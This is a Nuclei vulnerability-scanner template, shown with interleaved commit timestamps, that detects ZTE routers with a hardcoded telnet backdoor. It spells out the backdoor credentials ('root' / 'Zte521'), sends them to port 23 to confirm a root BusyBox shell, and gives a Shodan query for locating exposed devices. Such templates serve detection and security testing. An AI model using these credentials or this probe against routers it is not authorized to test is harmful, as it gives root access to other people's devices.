nuclei-templates/network/backdoor/backdoored-zte.yaml

35 lines
689 B
YAML
Raw Normal View History

id: backdoored-zte
2022-09-19 10:47:01 +00:00
info:
2022-09-19 11:18:41 +00:00
name: Backdoored ZTE Routers
2022-09-19 10:47:01 +00:00
author: its0x08
severity: high
description: |
Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
reference:
- https://www.exploit-db.com/ghdb/7179
2022-09-19 11:17:21 +00:00
metadata:
verified: true
shodan-query: http.html:"ZTE Corporation"
tags: edb,network,zte,telnet,backdoor,router
2022-09-19 10:47:01 +00:00
network:
- host:
- "{{Hostname}}"
- "{{Host}}:23"
inputs:
- data: "root\r\n"
- data: "Zte521\r\n\r\n"
read: 1024
matchers:
- type: word
words:
- "BusyBox"
extractors:
- type: regex
regex:
- '[A-Z]{1,}[0-9]{3,4}'